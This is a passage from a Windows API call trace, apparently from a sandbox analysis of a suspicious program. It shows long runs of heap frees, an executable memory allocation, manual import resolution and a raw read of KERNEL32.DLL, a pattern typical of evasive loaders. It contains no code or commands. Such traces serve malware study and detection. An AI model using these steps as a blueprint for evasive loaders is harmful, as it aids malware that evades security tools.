hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x247a6a0 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x248d8b0 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24a0ac0 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24b3cd0 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24c6ee0 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24da0f0 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x24ed300 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2500510 | out: hHeap=0x480000) returned 1 [0217.442] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2513720 | out: hHeap=0x480000) returned 1 [0217.442] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2526930 | out: hHeap=0x480000) returned 1 [0217.442] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2539b40 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x254cd50 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x255ff60 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2573170 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2586380 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2599590 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25ac7a0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25bf9b0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25d2bc0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x25f0080 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2603290 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26164a0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26296b0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x263c8c0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x264fad0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2662ce0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2675ef0 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2689100 | out: hHeap=0x480000) returned 1 [0217.443] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x269c310 | out: hHeap=0x480000) returned 1 [0217.448] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26af520 | out: hHeap=0x480000) returned 1 [0217.450] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26c2730 | out: hHeap=0x480000) returned 1 [0217.450] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26d5940 | out: hHeap=0x480000) returned 1 [0217.450] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26e8b50 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x26fbd60 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x270ef70 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2722180 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2735390 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27485a0 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x275b7b0 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x276e9c0 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2781bd0 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2794de0 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27a7ff0 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27bb200 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27ce410 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27e1620 | out: hHeap=0x480000) returned 1 [0217.452] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x27f4830 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2807a40 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x281ac50 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x282de60 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2841070 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2854280 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2867490 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x287a6a0 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x288d8b0 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28a0ac0 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28b3cd0 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28c6ee0 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28da0f0 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x28ed300 | out: hHeap=0x480000) returned 1 [0217.456] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2900510 | out: hHeap=0x480000) returned 1 [0217.460] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2913720 | out: hHeap=0x480000) returned 1 [0217.460] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2926930 | out: hHeap=0x480000) returned 1 [0217.460] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2939b40 | out: hHeap=0x480000) returned 1 [0217.460] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x294cd50 | out: hHeap=0x480000) returned 1 [0217.461] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x295ff60 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2973170 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2986380 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2999590 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29ac7a0 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29bf9b0 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29d2bc0 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29e5dd0 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x29f8fe0 | out: hHeap=0x480000) returned 1 [0217.462] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a0c1f0 | out: hHeap=0x480000) returned 1 [0217.465] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a1f400 | out: hHeap=0x480000) returned 1 [0217.465] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a32610 | out: hHeap=0x480000) returned 1 [0217.465] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a45820 | out: hHeap=0x480000) returned 1 [0217.465] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a58a30 | out: hHeap=0x480000) returned 1 [0217.465] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a6bc40 | out: hHeap=0x480000) returned 1 [0217.466] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a7ee50 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2a92060 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2aa5270 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ab8480 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2acb690 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ade8a0 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2af1ab0 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b04cc0 | out: hHeap=0x480000) returned 1 [0217.467] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b17ed0 | out: hHeap=0x480000) returned 1 [0217.470] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b2b0e0 | out: hHeap=0x480000) returned 1 [0217.470] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b3e2f0 | out: hHeap=0x480000) returned 1 [0217.470] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b51500 | out: hHeap=0x480000) returned 1 [0217.470] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b64710 | out: hHeap=0x480000) returned 1 [0217.470] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b77920 | out: hHeap=0x480000) returned 1 [0217.470] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b8ab30 | out: hHeap=0x480000) returned 1 [0217.472] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2b9dd40 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bb0f50 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bc4160 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bd7370 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bea580 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2bfd790 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c109a0 | out: hHeap=0x480000) returned 1 [0217.473] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c23bb0 | out: hHeap=0x480000) returned 1 [0217.476] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c36dc0 | out: hHeap=0x480000) returned 1 [0217.476] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c49fd0 | out: hHeap=0x480000) returned 1 [0217.476] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c5d1e0 | out: hHeap=0x480000) returned 1 [0217.476] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c703f0 | out: hHeap=0x480000) returned 1 [0217.476] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c83600 | out: hHeap=0x480000) returned 1 [0217.476] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2c96810 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ca9a20 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cbcc30 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ccfe40 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ce3050 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cf6260 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d09470 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d1c680 | out: hHeap=0x480000) returned 1 [0217.478] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d2f890 | out: hHeap=0x480000) returned 1 [0217.481] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d42aa0 | out: hHeap=0x480000) returned 1 [0217.481] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d55cb0 | out: hHeap=0x480000) returned 1 [0217.481] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d68ec0 | out: hHeap=0x480000) returned 1 [0217.481] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d7c0d0 | out: hHeap=0x480000) returned 1 [0217.481] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d8f2e0 | out: hHeap=0x480000) returned 1 [0217.483] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2da24f0 | out: hHeap=0x480000) returned 1 [0217.483] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2db5700 | out: hHeap=0x480000) returned 1 [0217.483] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2dc8910 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2df0080 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e03290 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e164a0 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e296b0 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e3c8c0 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e4fad0 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e62ce0 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e75ef0 | out: hHeap=0x480000) returned 1 [0217.484] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e89100 | out: hHeap=0x480000) returned 1 [0217.488] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2e9c310 | out: hHeap=0x480000) returned 1 [0217.489] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2eaf520 | out: hHeap=0x480000) returned 1 [0217.489] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ec2730 | out: hHeap=0x480000) returned 1 [0217.489] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ed5940 | out: hHeap=0x480000) returned 1 [0217.489] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ee8b50 | out: hHeap=0x480000) returned 1 [0217.491] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2efbd60 | out: hHeap=0x480000) returned 1 [0217.491] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f0ef70 | out: hHeap=0x480000) returned 1 [0217.491] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f22180 | out: hHeap=0x480000) returned 1 [0217.491] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f35390 | out: hHeap=0x480000) returned 1 [0217.491] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f485a0 | out: hHeap=0x480000) returned 1 [0217.491] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f5b7b0 | out: hHeap=0x480000) returned 1 [0217.493] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f6e9c0 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f81bd0 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2f94de0 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fa7ff0 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fbb200 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fce410 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2fe1620 | out: hHeap=0x480000) returned 1 [0217.494] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2ff4830 | out: hHeap=0x480000) returned 1 [0217.497] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3007a40 | out: hHeap=0x480000) returned 1 [0217.497] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x301ac50 | out: hHeap=0x480000) returned 1 [0217.497] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x302de60 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3041070 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3054280 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3067490 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x307a6a0 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x308d8b0 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x30a0ac0 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x30b3cd0 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x30c6ee0 | out: hHeap=0x480000) returned 1 [0217.498] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x30da0f0 | out: hHeap=0x480000) returned 1 [0217.501] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x30ed300 | out: hHeap=0x480000) returned 1 [0217.502] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3100510 | out: hHeap=0x480000) returned 1 [0217.504] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3113720 | out: hHeap=0x480000) returned 1 [0217.595] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0217.598] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0217.598] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0217.598] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0217.599] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0217.600] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0217.600] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0217.600] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0217.600] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0217.600] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0217.600] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0217.600] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0217.600] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0217.600] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0217.600] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0217.600] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0217.600] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0217.605] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0217.605] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0217.605] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0217.605] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0217.605] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0217.605] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0217.606] GetProcessHeap () returned 0x480000 [0217.606] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x68) returned 0x483eb0 [0217.607] GetProcessHeap () returned 0x480000 [0217.607] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4998c0 [0217.607] GetProcessHeap () returned 0x480000 [0217.607] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x48) returned 0x490e00 [0217.607] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0217.607] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0217.607] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0217.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0217.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0217.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0217.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0217.608] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0217.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0217.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0217.608] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0217.608] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0218.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0218.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0218.716] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0218.717] GetProcessHeap () returned 0x480000 [0218.717] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xac430) returned 0x4acc90 [0218.719] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0218.719] ReadFile (in: hFile=0x134, lpBuffer=0x4acc90, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4acc90*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0218.729] CloseHandle (hObject=0x134) returned 1 [0218.730] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0218.737] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0218.737] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0218.737] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0218.737] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0218.737] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0218.737] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0218.737] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 